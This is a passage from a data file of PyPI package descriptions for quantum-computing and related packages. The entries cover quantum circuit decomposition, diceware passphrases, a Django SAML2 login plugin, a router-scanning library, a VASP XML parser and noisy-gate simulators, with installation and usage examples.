quantum-decompExample>>>importnumpy,quantum_decomp>>>SWAP=numpy.array([[1,0,0,0],[0,0,1,0],[0,1,0,0],[0,0,0,1]])>>>print(quantum_decomp.matrix_to_qsharp(SWAP,op_name='Swap'))operationSwap(qs:Qubit[]):Unit{CNOT(qs[1],qs[0]);CNOT(qs[0],qs[1]);CNOT(qs[1],qs[0]);}>>>print(quantum_decomp.matrix_to_cirq_circuit(SWAP))0:\u2500\u2500\u2500@\u2500\u2500\u2500X\u2500\u2500\u2500@\u2500\u2500\u2500\u2502\u2502\u25021:\u2500\u2500\u2500X\u2500\u2500\u2500@\u2500\u2500\u2500X\u2500\u2500\u2500>>>print(quantum_decomp.matrix_to_qiskit_circuit(SWAP))\u250c\u2500\u2500\u2500\u2510\u250c\u2500\u2500\u2500\u2510q_0:\u2524X\u251c\u2500\u2500\u25a0\u2500\u2500\u2524X\u251c\u2514\u2500\u252c\u2500\u2518\u250c\u2500\u2534\u2500\u2510\u2514\u2500\u252c\u2500\u2518q_1:\u2500\u2500\u25a0\u2500\u2500\u2524X\u251c\u2500\u2500\u25a0\u2500\u2500\u2514\u2500\u2500\u2500\u2518Seeexample.ipynbfor more examples and instructions how to\nuse this tool.ReferencesThis tool was inspired byMicrosoft Q# Coding Contestand was implemented as part of online course \"Applications of Quantum Mechanics\" at MIT.See thispaperfor detailed description\nof the algorithm and further references to papers with algorithms.Blog postabout the tool."} +{"package": "quantum-demo", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-dice", "pacakge-description": "The Quantum Dice leverages the IBM Q quantum computer to generate a truly random set of numbers."} +{"package": "quantumdiceware", "pacakge-description": "Generate truly random diceware passphrases.FeaturesSimulates dice rolls by gathering quantum data.Includes the complete standard Diceware wordlist.Generate passphrases from custom wordlists.Python 3.6 is required.UsageInstall$ pip install quantumdicewareGenerate a Passphrase$ qdgGenerate five Passphrases and save them to output.txt$ qdg -c 5 > output.txtGenerate two Passphrases that are eight words long$ qdg -c 2 -w 8DocumentationFor more in-line help, run:$ qdg -hQDG\u2019s documentation lives atqdg.readthedocs.ioSeeThe Diceware Passphrase Home Pageto learn more about Diceware.MetaJustin M. Sloan -justinsloan.comPublic Domain. SeeLICENSE.txtfor more information.https://github.com/justinsloan/qdg"} +{"package": "quantum-distance-based-classifier", "pacakge-description": "The Quantum Distance-based classifier is a technique inspired by the classical k-Nearest Neighbors that leverage quantum properties to perform prediction. 
The package has been implemented in Qiskit.```\n from quantum_distance_based_classifier.quantum_distance_based_classifier import QuantumDistaceBasedClassifier\n from sklearn import preprocessing\n from sklearn.datasets import load_iris\n from sklearn.preprocessing import StandardScaler\n import numpy as np\n\n\n X, y = load_iris(return_X_y=True)\n\n n_features = 2\n X = X[:, :n_features] # Keep only n_features\n\n # Standardize and normalize the features\n X = StandardScaler().fit_transform(X)\n X = preprocessing.normalize(X, axis=1)\n\n # Initialize variables to store sampled instances\n sampled_X = []\n sampled_y = []\n\n # Loop through each class to sample instances\n for class_label in np.unique(y):\n class_indices = np.where(y == class_label)[0]\n sampled_indices = np.random.choice(class_indices, size=instances_per_class, replace=False)\n sampled_X.extend(X[sampled_indices])\n sampled_y.extend(y[sampled_indices])\n\n # Convert lists to numpy arrays\n sampled_X = np.array(sampled_X)\n sampled_y = np.array(sampled_y)\n\n qdbc = QuantumDistaceBasedClassifier()\n qdbc.fit(sampled_X, sampled_y)\n result = qdbc.predict(sampled_X[0])\n print(f\"Classification result: {result}\")\n ```"} +{"package": "quantum-django-saml2-auth", "pacakge-description": "Author:Fang LiVersion:Use 1.1.4 for Django <=1.9, 2.x.x for Django >= 1.9, Latest supported django version is 2.1This project aims to provide a dead simple way to integrate SAML2\nAuthentication into your Django powered app. Try it now, and get rid of the\ncomplicated configuration of SAML.Any SAML2 based SSO(Single-Sign-On) identity provider with dynamic metadata\nconfiguration is supported by this Django plugin, for example Okta.When you raise an issue or PRPlease note this library is used in tons of production environment and plays a mission-critical role in most deployment. It supports almost all django versions since 1.1.4. We need to be extremely careful when merging any changes.So most non-security features or enhancements will be REJECTED. please fork your own version or just copy the code as you need. I want to make this module dead simple and reliable. That means when you have it properly configured, you are not likely to get into any troubles in the future.The supports to new versions of django are still welcome and I\u2019ll make best effort to make it latest django compatible.DonateWe accept your donations by clicking the awesomeinstead of any physical transfer.DependenciesThis plugin is compatible with Django 1.6/1.7/1.8/1.9/1.10. Thepysaml2Python\nmodule is required.InstallYou can install this plugin viapip:# pip install django_saml2_author from source:# git clone https://github.com/fangli/django-saml2-auth\n# cd django-saml2-auth\n# python setup.py installxmlsec is also required by pysaml2:# yum install xmlsec1//or# apt-get install xmlsec1//Mac# brew install xmlsec1What does this plugin do?This plugin takes over Django\u2019s login page and redirect the user to a SAML2\nSSO authentication service. Once the user is logged in and redirected back,\nthe plugin will check if the user is already in the system. If not, the user\nwill be created using Django\u2019s default UserModel, otherwise the user will be\nredirected to their last visited page.How to use?Import the views module in your root urls.pyimportdjango_saml2_auth.viewsOverride the default login page in the root urls.py file, by adding these\nlinesBEFOREanyurlpatterns:# These are the SAML2 related URLs. 
You can change \"^saml2_auth/\" regex to# any path you want, like \"^sso_auth/\", \"^sso_login/\", etc. (required)url(r'^saml2_auth/',include('django_saml2_auth.urls')),# The following line will replace the default user login with SAML2 (optional)# If you want to specific the after-login-redirect-URL, use parameter \"?next=/the/path/you/want\"# with this view.url(r'^accounts/login/$',django_saml2_auth.views.signin),# The following line will replace the admin login with SAML2 (optional)# If you want to specific the after-login-redirect-URL, use parameter \"?next=/the/path/you/want\"# with this view.url(r'^admin/login/$',django_saml2_auth.views.signin),Add \u2018django_saml2_auth\u2019 to INSTALLED_APPSINSTALLED_APPS=['...','django_saml2_auth',]In settings.py, add the SAML2 related configuration.Please note, the only required setting isMETADATA_AUTO_CONF_URL.\nThe following block shows all required and optional configuration settings\nand their default values.SAML2_AUTH={# Metadata is required, choose either remote url or local file path'METADATA_AUTO_CONF_URL':'[The auto(dynamic) metadata configuration URL of SAML2]','METADATA_LOCAL_FILE_PATH':'[The metadata configuration file path]',# Optional settings below'DEFAULT_NEXT_URL':'/admin',# Custom target redirect URL after the user get logged in. Default to /admin if not set. This setting will be overwritten if you have parameter ?next= specificed in the login URL.'CREATE_USER':'TRUE',# Create a new Django user when a new user logs in. Defaults to True.'NEW_USER_PROFILE':{'USER_GROUPS':[],# The default group name when a new user logs in'ACTIVE_STATUS':True,# The default active status for new users'STAFF_STATUS':True,# The staff status for new users'SUPERUSER_STATUS':False,# The superuser status for new users},'ATTRIBUTES_MAP':{# Change Email/UserName/FirstName/LastName to corresponding SAML2 userprofile attributes.'email':'Email','username':'UserName','first_name':'FirstName','last_name':'LastName',},'TRIGGER':{'CREATE_USER':'path.to.your.new.user.hook.method','BEFORE_LOGIN':'path.to.your.login.hook.method',},'ASSERTION_URL':'https://mysite.com',# Custom URL to validate incoming SAML requests against'ENTITY_ID':'https://mysite.com/saml2_auth/acs/',# Populates the Issuer element in authn request'NAME_ID_FORMAT':FormatString,# Sets the Format property of authn NameIDPolicy element'USE_JWT':False,# Set this to True if you are running a Single Page Application (SPA) with Django Rest Framework (DRF), and are using JWT authentication to authorize client users'FRONTEND_URL':'https://myfrontendclient.com',# Redirect URL for the client if you are using JWT auth with DRF. See explanation below'ALLOWED_REDIRECT_HOSTS':[\"https://myfrontendclient.com\"]# Allowed hosts to redirect to using the ?next parameter}In your SAML2 SSO identity provider, set the Single-sign-on URL and Audience\nURI(SP Entity ID) tohttp://your-domain/saml2_auth/acs/ExplanationMETADATA_AUTO_CONF_URLAuto SAML2 metadata configuration URLMETADATA_LOCAL_FILE_PATHSAML2 metadata configuration file pathCREATE_USERDetermines if a new Django user should be created for new users.NEW_USER_PROFILEDefault settings for newly created usersATTRIBUTES_MAPMapping of Django user attributes to SAML2 user attributesTRIGGERHooks to trigger additional actions during user login and creation\nflows. These TRIGGER hooks are strings containing adotted module namewhich point to a method to be called. 
The referenced method should accept a single argument which is a dictionary of attributes and values sent by the identity provider, representing the user's identity.\nTRIGGER.CREATE_USER: A method to be called upon new user creation. This method will be called before the new user is logged in and after the user's record is created. This method should accept ONE parameter, the user dict.\nTRIGGER.BEFORE_LOGIN: A method to be called when an existing user logs in. This method will be called before the user is logged in and after user attributes are returned by the SAML2 identity provider. This method should accept ONE parameter, the user dict. (A minimal example hook module is sketched below.)\nASSERTION_URL: A URL to validate incoming SAML responses against. By default, django-saml2-auth will validate the SAML response's Service Provider address against the actual HTTP request's host and scheme. If this value is set, it will validate against ASSERTION_URL instead - perfect for when Django is running behind a reverse proxy.\nENTITY_ID: The optional entity ID string to be passed in the 'Issuer' element of the authn request, if required by the IDP.\nNAME_ID_FORMAT: Set to the string 'None' to exclude sending the 'Format' property of the 'NameIDPolicy' element in authn requests. Default value if not specified is 'urn:oasis:names:tc:SAML:2.0:nameid-format:transient'.\nUSE_JWT: Set this to the boolean True if you are using Django Rest Framework with JWT authentication.\nFRONTEND_URL: If USE_JWT is True, you should set the URL of where your frontend is located (it will default to DEFAULT_NEXT_URL if you fail to do so). Once the client is authenticated through SAML/SSO, your client is redirected to the FRONTEND_URL with the user id (uid) and JWT token (token) as query parameters. Example: 'https://myfrontendclient.com/?uid=<user_id>&token=<jwt_token>'. With these params your client can now authenticate with server resources.\nCustomize\nThe default permission denied page and user welcome page can be overridden. To override these pages put a template named 'django_saml2_auth/welcome.html' or 'django_saml2_auth/denied.html' in your project's template folder. If a 'django_saml2_auth/welcome.html' template exists, that page will be shown to the user upon login instead of the user being redirected to the previously visited page. This welcome page can contain some first-visit notes and welcome words. 
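Returning to the TRIGGER settings above, here is a minimal sketch of such a hook module (the module path myapp/hooks.py and the logging calls are illustrative assumptions; the only documented contract is that each hook receives a single dict of user attributes):

# myapp/hooks.py -- hypothetical module, referenced from settings as
# 'TRIGGER': {'CREATE_USER': 'myapp.hooks.create_user',
#             'BEFORE_LOGIN': 'myapp.hooks.before_login'}
import logging

logger = logging.getLogger(__name__)


def create_user(user):
    # 'user' is the dict of attributes sent by the identity provider
    logger.info('New SAML2 user created: %s', user)


def before_login(user):
    # called with the same attribute dict before an existing user is logged in
    logger.info('SAML2 login: %s', user)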
TheDjango user objectis available within the template as theusertemplate variable.To enable a logout page, add the following lines to urls.py, before anyurlpatterns:# The following line will replace the default user logout with the signout page (optional)url(r'^accounts/logout/$',django_saml2_auth.views.signout),# The following line will replace the default admin user logout with the signout page (optional)url(r'^admin/logout/$',django_saml2_auth.views.signout),To override the built in signout page put a template named\n\u2018django_saml2_auth/signout.html\u2019 in your project\u2019s template folder.If your SAML2 identity provider uses user attribute names other than the\ndefaults listed in thesettings.pyATTRIBUTES_MAP, update them insettings.py.For Okta UsersI created this plugin originally for Okta.The METADATA_AUTO_CONF_URL needed insettings.pycan be found in the Okta\nweb UI by navigating to the SAML2 app\u2019sSign Ontab, in the Settings box.\nYou should see :Identity Provider metadata is available if this application supports dynamic configuration.TheIdentity Provider metadatalink is the METADATA_AUTO_CONF_URL.How to ContributeCheck for open issues or open a fresh issue to start a discussion around a feature idea or a bug.Forkthe repositoryon GitHub to start making your changes to themasterbranch (or branch off of it).Write a test which shows that the bug was fixed or that the feature works as expected.Send a pull request and bug the maintainer until it gets merged and published. :) Make sure to add yourself toAUTHORS.Release Log2.2.1: Fixed is_safe_url parameters issue for django 2.12.2.0: ADFS SAML compatibility and fixed some issue for Django2.02.1.2: Merged #352.1.1: Added ASSERTION_URL in settings.2.1.0: Add DEFAULT_NEXT_URL. Issue #19.2.0.4: Fixed compatibility with Windows.2.0.3: Fixed a vulnerabilities in the login flow, thanks qwrrty.2.0.1: Add support for Django 1.101.1.4: Fixed urllib bug1.1.2: Added support for Python 2.7/3.x1.1.0: Added support for Django 1.6/1.7/1.8/1.91.0.4: Fixed English grammar mistakes"} +{"package": "quantumdl", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-dots", "pacakge-description": "soon"} +{"package": "quantum-dummy", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-dynamics", "pacakge-description": "Thequantum_dynamicspackage contains tools for simulation of 1D\ntime-dependent Schr\u00f6dinger equation. The package allows for simulation of 1D\nmodel potentials and time-dependent external interactions, e.g., an laser\nelectric field in the dipole approximation.This package has been created as a reference solution to an exercise in the\ncomputational physics course at Tampere University of Technology in Spring\n2018.The key numerical methods behind the package are:finite-difference approximation of the laplacian operator with Dirichlet\nboundary conditions at the endpoints of the simulation gridexponential mid-point rule for the time-evolution operatorkrylov-subspace based implementation of the matrix exponentialUpon successful installation, two executables are copied to your PATH:qdyn_laserplot_time_evolutionqdyn_laserThis simulates the electron in 1D soft coulomb potential (\u201c1D hydrogen\u201d) under\nlaser electric field with sin^2 envelope and cosine carrier wave. Please\nconsult the help of the script for all options:qdyn_laser--help.After a successful simulation, an outputfile of HDF5-format is created. 
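Before digging into the individual datasets described below, a quick way to sanity-check that output file is to open it with h5py and list its contents (a minimal sketch; 'myfile.h5' stands in for whatever output filename your qdyn_laser run produced):

import h5py

# 'myfile.h5' is a placeholder for the HDF5 output file written by qdyn_laser
with h5py.File('myfile.h5', 'r') as f:
    print(list(f.keys()))             # e.g. coordinate_grid, savetimes, wavefunction, ...
    grid = f['coordinate_grid'][...]  # gridpoints of the coordinate space
    times = f['savetimes'][...]       # times corresponding to the saved wavefunction values
    psi = f['wavefunction'][...]      # first index: grid point, second index: save time
print(grid.shape, times.shape, psi.shape)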
It\ncontains the following datasets and groupscoordinate_gridThe gridpoints of the coordinate space used in the calculation.savetimesThe times corresponding to the saved wavefunction values in the file.wavefunctionA 2D array of values of the wavefunction. The first index corresponds tocoordinate_gridand the second index tosavetimes.final_wavefunctionWavefunction values at the end of the simulation.laserThe laser electric field foralltimesteps. First column is times, second\nthe laser electric field values.tise_hamiltonianThe time-independent part of the Hamiltonian matrix. It\u2019s saved as a sparse\nmatrix and can be loaded withquantum_dynamics.utils.load_sparse_matrixlike:from quantum_dynamics.utils import load_sparse matrix\nimport h5py\n\nwith h5py.File(\"myfile.h5\", \"r\") as f:\n H0 = load_sparse_matrix(f['tise_hamiltonian'])plot_time_evolutionThis can be used to visualize the time-evolved density calcualted withqdyn_laser. For usage instructions, please seeplot_time_evolution--help.AuthorsJanne Solanp\u00e4\u00e4"} +{"package": "quantum-edward", "pacakge-description": "Quantum EdwardInstallationYou can install Quantum Edward from the Python package managerpipusing:pip install qedward --userQuantum Edward at this point is just a small library of Python tools for\ndoing classical supervised learning on Quantum Neural Networks (QNNs).An analytical model of the QNN is entered as input into QEdward and the training\nis done on a classical computer, using training data already available (e.g.,\nMNIST), and using the famous BBVI (Black Box Variational Inference) method\ndescribed in Reference 1 below.The input analytical model of the QNN is given as a sequence of gate\noperations for a gate model quantum computer. The hidden variables are\nangles by which the qubits are rotated. The observed variables are the input\nand output of the quantum circuit. Since it is already expressed in the qc's\nnative language, once the QNN has been trained using QEdward, it can be\nrun immediately on a physical gate model qc such as the ones that IBM and\nGoogle have already built. By running the QNN on a qc and doing\nclassification with it, we can compare the performance in classification\ntasks of QNNs and classical artificial neural nets (ANNs).Other workers have proposed training a QNN on an actual physical qc. But\ncurrent qc's are still fairly quantum noisy. Training an analytical QNN on a\nclassical computer might yield better results than training it on a qc\nbecause in the first strategy, the qc's quantum noise does not degrade the\ntraining.The BBVI method is a mainstay of the \"Edward\" software library. Edward uses\nGoogle's TensorFlow lib to implement various inference methods (Monte Carlo\nand Variational ones) for Classical Bayesian Networks and for Hierarchical\nModels. H.M.s (pioneered by Andrew Gelman) are a subset of C.B. nets\n(pioneered by Judea Pearl). Edward is now officially a part of TensorFlow,\nand the original author of Edward, Dustin Tran, now works for Google. Before\nEdward came along, TensorFlow could only do networks with deterministic\nnodes. With the addition of Edward, TensorFlow now can do nets with both\ndeterministic and non-deterministic (probabilistic) nodes.This first baby-step lib does not do distributed computing. 
The hope is that\nit can be used as a kindergarten to learn about these techniques, and that\nthen the lessons learned can be used to write a library that does the same\nthing, classical supervised learning on QNNs, but in a distributed fashion\nusing Edward/TensorFlow on the cloud.The first version of Quantum Edward analyzes two QNN models called NbTrols\nand NoNbTrols. These two models were chosen because they are interesting to\nthe author, but the author attempted to make the library general enough so\nthat it can accommodate other akin models in the future. The allowable\nmodels are referred to as QNNs because they consist of 'layers',\nas do classical ANNs (Artificial Neural Nets). TensorFlow can analyze\nlayered models (e.g., ANN) or more general DAG (directed acyclic graph)\nmodels (e.g., Bayesian networks).This software is distributed under the MIT License.ReferencesR. Ranganath, S. Gerrish, D. M. Blei, \"Black Box Variational\nInference\",https://arxiv.org/abs/1401.0118https://en.wikipedia.org/wiki/Stochastic_approximationdiscusses Robbins-Monro conditionshttps://github.com/keyonvafa/logistic-reg-bbvi-blog/blob/master/log_reg_bbvi.pyhttp://edwardlib.org/https://discourse.edwardlib.org/"} +{"package": "quantum-entanglement", "pacakge-description": "soon"} +{"package": "quantum-esperanto", "pacakge-description": "Quantum Esperantois a fast parser of XML files output by DFT codes (vaspas of now) written in Cython.\nIt takes advantage of lxml, a Python wrapper aroundlibxml2library, and its Cython interface.\nXML files are parsed to a Python dictionary in a transparent way. It is really fast, up to 10 times faster than the\nparser used bypymatgenproject.InstallationThe development versions of librarieslibxml2andlibxsltmust be present in the system. Check with the command:$ xslt-configAlso, C compiler such asgccmust be present. The recommended way of installing Quantum Esperanto is withpipfrom PyPI:$ pip install quantum_esperantoIf one is interested in obtaining latest versions of the package, it can be installed using the source\ncode fromGitHub:$ git clone https://github.com/tilde-lab/quantum_esperanto\n$ cd quantum_esperanto\n$ pip install .The Python prerequisites for the package arenumpyandlxml(should be installed automatically withpip).It is possible to install the package in development mode. This will installCythonas well asnosetest suite.\nTo do it issue the following command after cloning the repository and changing the directory:$ cd quantum_esperanto\n$ pip install -e .[dev]After install it is possible to run several tests to check if the installation was completed successfully. It can be\ndone with the following commands inquantum_esperantodirectory:$ python setup.py testIf everything is OK, you\u2019re all set to start using the package.UsageThe parser can be used in a very simple way. First, the parser has to be instantiated, and then theparse_filemethod of the parser returns the dictionary of parsed values:fromquantum_esperanto.vaspimportVaspParserparser=VaspParser()d=parser.parse_file('vasprun.xml')The possible arguments for the parser are:recover(boolean, default:True) a flag that allows recovering broken XML. It is very useful in case of unfinished\ncalculations; however, it exits on the first XML error and the returned dictionary contains parsed values up to the\nfirst XML error only. When XML recovery is needed, a warning is printed to stderr.whitelist(list, default:None) the list of parent tag names that are only needed to parsed. 
If None, then all tags are parsed.Parsing resultThe result of parsing is a dictionary that follows the structure ofvasprun.xml. The keys of the dictionary are\neither tag names (fori,v,varraytags), ortag:tag nameconstruction (for tags that do have name\nattribute), or just tags themselves. The values are either tag contents converted to the right type (specified bytypetag attribute) or (in case of varrays and sets) Numpy arrays. Fortran overflows (denoted by*****) are converted to\nNaNs in case of float values and to MAXINT in case of integer values.Example:xml file1.433000001.433000001.433000001.43300000-1.43300000-1.43300000-1.433000001.43300000-1.4330000011.770598950.348918350.348918350.000000000.34891835-0.00000000-0.34891835-0.000000000.34891835-0.348918350.000000000.000000000.00000000resulting dictionary(printed withpprint):{'structure:primitive_cell':{'crystal':{'basis':array([[1.433,1.433,1.433],[1.433,-1.433,-1.433],[-1.433,1.433,-1.433]]),'rec_basis':array([[0.34891835,0.34891835,0.],[0.34891835,-0.,-0.34891835],[-0.,0.34891835,-0.34891835]]),'volume':11.77059895},'positions':array([[0.,0.,0.]])}}LicenseQuantum Esperanto is licensed under MIT license."} +{"package": "quantum-expresso-analize", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quantumflow", "pacakge-description": "QuantumFlow: A Quantum Algorithms Development ToolkitA cross-compiler for gate based models of quantum computingTutorialSource CodeIssue TrackerAPI DocumentationInstallationTo install the latest stable release:$ pip install quantumflowIn addition, install all of the external quantum libraries that QuantumFlow can interact with (such as cirq, qiskit, braket, ect.):$ pip install quantumflow[ext]To install the latest code from github ready for development:$ git clone https://github.com/gecrooks/quantumflow.git\n$ cd quantumflow\n$ pip install -e .[dev]"} +{"package": "quantum-gates", "pacakge-description": "Noisy Quantum GatesImplementation of the Noisy Quantum Gates model, published inDi Bartolomeo, 2023. It is a novel method to simulate the noisy behaviour of quantum devices by incorporating the noise directly in the gates, which become stochastic matrices.DocumentationsThe documentation for Noisy Quantum Gates can be accessed on the websiteRead the Docs.How to installRequirementsThe Python version should be 3.9 or later. Find your Python version by typingpythonorpython3in the CLI.\nWe recommend using the repo together with anIBM Quantum Labaccount, as it necessary for circuit compilation with Qiskit in many cases.Installation as a userThe library is available on the Python Package Index (PyPI) withpip install quantum-gates.Installation as a contributorFor users who want to have control over the source code, we recommend the following installation. Clone the repository\nfromGithub, create a new virtual environment, and activate the\nenvironment. Then you can build the wheel and install it with the package manager of your choice as described in the\nsectionHow to contribute. This will install all dependencies in your virtual environment,\nand install a working version of the library.QuickstartExecute the following code in a script or notebook. Add your IBM token to by defining it as the variable IBM_TOKEN = \"your_token\". 
Optimally, you save your token in a separate file that is not in your version control system, so you are not at risk of accidentally revealing your access token.# Standard librariesimportnumpyasnpimportjson# QiskitfromqiskitimportQuantumCircuit,transpilefromqiskit.visualizationimportplot_histogram# Own libraryfromquantum_gates.simulatorsimportMrAndersonSimulatorfromquantum_gates.gatesimportstandard_gatesfromquantum_gates.circuitsimportEfficientCircuitfromquantum_gates.utilitiesimportDeviceParametersfromquantum_gates.utilitiesimportsetup_backendIBM_TOKEN=\"\"We create a quantum circuit with Qiskit.circ=QuantumCircuit(2,2)circ.h(0)circ.cx(0,1)circ.barrier(range(2))circ.measure(range(2),range(2))circ.draw('mpl')We load the configuration from a json file or from code withconfig={\"backend\":{\"hub\":\"ibm-q\",\"group\":\"open\",\"project\":\"main\",\"device_name\":\"ibmq_manila\"},\"run\":{\"shots\":1000,\"qubits_layout\":[0,1],\"psi0\":[1,0,0,0]}}... and setup the Qiskit backend used for the circuit transpilation.backend_config=config[\"backend\"]backend=setup_backend(Token=IBM_TOKEN,**backend_config)run_config=config[\"run\"]This allows us to load the device parameters, which represent the noise of the quantum hardware.qubits_layout=run_config[\"qubits_layout\"]device_param=DeviceParameters(qubits_layout)device_param.load_from_backend(backend)device_param_lookup=device_param.__dict__()Last, we perform the simulation ...sim=MrAndersonSimulator(gates=standard_gates,CircuitClass=EfficientCircuit)t_circ=transpile(circ,backend,scheduling_method='asap',initial_layout=qubits_layout,seed_transpiler=42)probs=sim.run(t_qiskit_circ=t_circ,qubits_layout=qubits_layout,psi0=np.array(run_config[\"psi0\"]),shots=run_config[\"shots\"],device_param=device_param_lookup,nqubit=2)counts_ng={format(i,'b').zfill(2):probs[i]foriinrange(0,4)}... and analyse the result.plot_histogram(counts_ng,bar_labels=False,legend=['Noisy Gates simulation'])UsageWe recommend to read theoverviewof the documentation as a 2-minute preparation.ImportsThere are two ways of importing the package. 1) If you installed the code with pip, then the imports are simply of the form seen in theQuickstart.fromquantum_gates.simulatorsimportMrAndersonSimulatorfromquantum_gates.gatesimportstandard_gatesfromquantum_gates.circuitsimportEfficientCircuitfromquantum_gates.utilitiesimportDeviceParameters,setup_backendIf you use the source code directly and develop within the repository, then the imports becomefromsrc.quantum_gates._simulation.simulatorimportMrAndersonSimulatorfromsrc.quantum_gates._gates.gatesimportstandard_gatesfromsrc.quantum_gates._simulation.circuitimportEfficientCircuitfromsrc.quantum_gates._utility.device_parametersimport(DeviceParameters,setup_backend)FunctionalityThe main components are thegates,\nand thesimulator.\nOne can configure the gates with differentpulse shapes,\nand the simulator with differentcircuit classesandbackends. The circuit classes use a specific\nbackend for the statevector simulation.\nTheEfficientBackendhas the same functionality as\ntheStandardBackend, but is much more performant\nthanks to optimized tensor contraction algorithms. We also provide variousquantum algorithmsas circuits, and\nscripts to run the circuits with the simulator, the IBM simulator, and a real IBM backend. Last, all functionality is\nunit tested and one can get sample code from the unit tests.Unit TestsWe recommend running the unit tests once you are finished with the setup of your environment. 
As some tests need access\nto IBM devices, you have to create a script token.py in the configuration folder. You can check the token_template.py\nfor reference. Make sure that your token is active and you have accepted all license agreement with IBM in your IBM\naccount.How to contributeContributions are welcomed and should apply the usual git-flow: fork this repo, create a local branch named\n'feature-...'. Commit often to ensure that each commit is easy to understand. Name your commits\n'[feature-...] Commit message.', such that it possible to differentiate the commits of different features in the\nmain line. Request a merge to the mainline often. Contribute to the test suite and verify the functionality with the unit tests when using a different Python version or dependency versions. Please remember to follow thePEP 8 style guide, and add comments whenever it helps. The correspondingauthorsare happy to support you.BuildYou may also want to create your own distribution and test it. Navigate to the repository in your CLI of choice.\nBuild the wheel with the commandpython3 -m build --sdist --wheel .and navigate to the distribution withcd dist.\nUselsto display the name of the wheel, and runpip install .whlwith the correct filename.\nNow you can use your version of the library.CreditsPlease cite the work using the following BibTex entry:@article{PhysRevResearch.5.043210,\n title = {Noisy gates for simulating quantum computers},\n author = {Di Bartolomeo, Giovanni and Vischi, Michele and Cesa, Francesco and Wixinger, Roman and Grossi, Michele and Donadi, Sandro and Bassi, Angelo},\n journal = {Phys. Rev. Res.},\n volume = {5},\n issue = {4},\n pages = {043210},\n numpages = {19},\n year = {2023},\n month = {Dec},\n publisher = {American Physical Society},\n doi = {10.1103/PhysRevResearch.5.043210},\n url = {https://link.aps.org/doi/10.1103/PhysRevResearch.5.043210}\n}AuthorsThis project has been developed thanks to the effort of the following people:Giovanni Di Bartolomeo (dibartolomeo.giov@gmail.com)Michele Vischi (vischimichele@gmail.com)Francesco CesaMichele Grossi (michele.grossi@cern.ch)Sandro DonadiAngelo BassiRoman Wixinger (roman.wixinger@gmail.com)"} +{"package": "quantum-gateway", "pacakge-description": "Query a Quantum GatewayThis library allows a Verizon FiOS Quantum Gateway to be queried. It uses therequestslibrary to authenticate, log in, and query the web interface of the gateway.UsagePlease note for G1100 devices: as of the Firmware version 02.02.00.13 and UI version v1.0.388 https is the only way to get to the admin console. This is using a self signed cert as well. The code now defaults to https and ignores the self signed cert warning.# Importfromquantum_gatewayimportQuantumGatewayScanner# Connect to gateway via HTTPSgateway=QuantumGatewayScanner('192.168.1.1','your_password_here')# Or, connect to gateway via HTTPgateway=QuantumGatewayScanner('192.168.1.1','your_password_here',False)# Property is set to True if we successfully logged in, otherwise Falsegateway.success_init# Get list of all connected devices' MAC addressesgateway.scan_devices()# Get specific device's namegateway.get_device_name('mac address of device here')NotesTested on Verizon FiOS-provided gateway:UI Version:v1.0.388UnknownUnknownFirmware Version:02.02.00.133.1.0.123.1.1.17Model Name:FiOS-G1100FiOS-G3100FiOS-G3100Hardware Version:1.0311041104Please open a Githubissueor reply to the Home Assistant forumpostif you encounter any problems. 
Thanks!\"}
{"package": "quantumgraphs", "pacakge-description": "No description available on PyPI."}
{"package": "quantumgrid", "pacakge-description": "About\nExterior Complex Scaled Finite-Element Discrete Variable Representation grid for general physics problems. In other words, quantumGrid is a package for solving a 1-D Schrödinger equation for an arbitrary potential.\nMotivation\nThis python package was created for a graduate course in time-dependent quantum mechanics at UC Davis. Given the ease of programming in python, and the generality and usefulness of a Finite Element Method - Discrete Variable Representation (FEM-DVR) grid for solving the Schrödinger equation and simple scattering problems, we wanted to go open source and provide this numerical tool for others in the name of science!\nDocumentation\nFor more details on using quantumGrid, check out our manual here: https://quantumgrid.readthedocs.io.\nHistory\n0.0.1 (2020-05-31): First release on PyPI."}
{"package": "quantum-grove", "pacakge-description": "No description available on PyPI."}
{"package": "quantum-gtk", "pacakge-description": "No description available on PyPI."}
{"package": "quantum-image-classifier", "pacakge-description": "Quantum image classifier\nData use\nYou can generate synthetic data by calling the function generate_synthetic_data(n_dim: int, n_clusters: int, m_samples: int) implemented in data_generator.py. You have to be aware that, in order for Nearest Centroid to work, n_dim has to be a power of 2. This function returns a set of m_samples vectors X with a set of labels y, where each label in y is associated with the vector at the same position in X. Example:\nX, y = generate_synthetic_data(8, 4, 250)\ntrain_X = X[:200]\ntrain_y = y[:200]\ntest_X = X[200:]\ntest_y = y[200:]\nIf you want, you can also use the MNIST dataset, with a PCA used to reduce the dimension to n components, by calling get_MNIST(n_components), implemented in data_loader.py. Same as with the synthetic data, you have to be aware to use only a power of 2 for Nearest Centroid to work. 
Example:train_X, train_y, test_X, test_y = get_MNIST(8)ClassifiersNearest centroidOnce you get the data, you need to create the object NearestCentroid with the training dataset that you want. After that, you can call the functionpredict(self, X: np.ndarray)owned by the defined object. Example:train_X, train_y, test_X, test_y = get_MNIST(8)\nnearest_centroid = NearestCentroid(train_X, train_y, n_dim)\nlabels_predicted = nearest_centroid.predict(test_X)"} +{"package": "quantum-inferno", "pacakge-description": "quantum-infernoQuantized Information Entropy, Nth OctaveCaveat Emptor: Early Release Dev VersionDescriptionComputes standardized time-frequency representations (TFRs) for power, information, and entropy,\nbuilt on the Gabor wavelets with minimal time-frequency uncertainty with\nlogarithmic constant-Q base 2 (binary) scales and frequency bands of quantized order N.All algorithms are based on FFTs for computational efficiency.\nThe short-term Fourier transform (STFT) is included as the baseline TFR.\nAlgorithms for the Continuous Wavelet Transform (CWT), Discrete Wavelet Transform (DWT),\nand Stockwell Transform (STX) are provided.Refer to the open access publications:Garc\u00e9s, M.A. Quantized Information in Spectral Cyberspace. Entropy 2023, 25, 419Garc\u00e9s, M.A. Quantized Constant-Q Gabor Atoms for\nSparse Binary Representations of Cyber-Physical Signatures. Entropy 2020, 22, 936Garc\u00e9s, M.A. On Infrasound Standards, Part 1 Time, Frequency, and Energy Scaling.\nInframatics 2013, 2, 13-35Recommended background reading in chronological order:Gabor, D. Theory of Communication, Part 3. Electr. Eng. 1946, 93, 445\u2013457.Shannon, C.E. The Mathematical Theory of Communication; University of Illinois Press: Urbana, IL, USA, 1998; [1949 first ed].Harris, F. J. On the Use of Windows for Harmonic Analysis with the Discrete Fourier Transform, Proceedings of the IEEE, 1978, 66 